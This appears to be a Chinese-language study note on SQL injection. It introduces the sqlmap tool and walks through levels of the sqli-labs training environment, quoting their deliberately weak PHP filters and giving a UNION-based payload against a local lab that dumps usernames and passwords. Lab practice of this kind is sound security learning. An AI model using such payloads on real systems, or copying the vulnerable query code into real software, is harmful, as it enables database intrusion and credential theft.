简介

Sqlmap是一种开源的渗透测试工具，可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令
支持的数据库：

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB

SQL注入技术：

boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band

枚举数据：

users, password hashes, privileges, roles, databases, tables and columns

注入类型总结

在不断实践中经常遇到如下注入类型，总结如下：

第二十五关 基于错误的GET单引号-你的OR及AND归我所有

这个系列是绕过注入，题目已提示需要绕过的字符，且能显示出输入的payload

源码审计

1
2
3
4
5
6
7

function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)
	
	return $id;
}

从代码可以看出是吧or和and忽略大小正则替换成空

第二十三关 基于GET错误的过滤注释

注入点判断

1. 老办法单引号反斜杠试了下确实报错
2. 但注释过不了怀疑注释有过滤

3. 查看源代码,发现将#和–替换成空了

   1 2 3 4 5 6 7 8 9 10 11

   $reg = "/#/"; $reg1 = "/--/"; $replace = ""; $id = preg_replace($reg, $replace, $id); $id = preg_replace($reg1, $replace, $id); $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);

4. 直接上payload

   http://127.0.0.1/sqlilabs2/Less-23/?id=-1' union select 1,(select group_concat(username,password ) from users),3 and ‘1’ = ‘1

第十八关 基于POST错误的Uagent字段数据头注入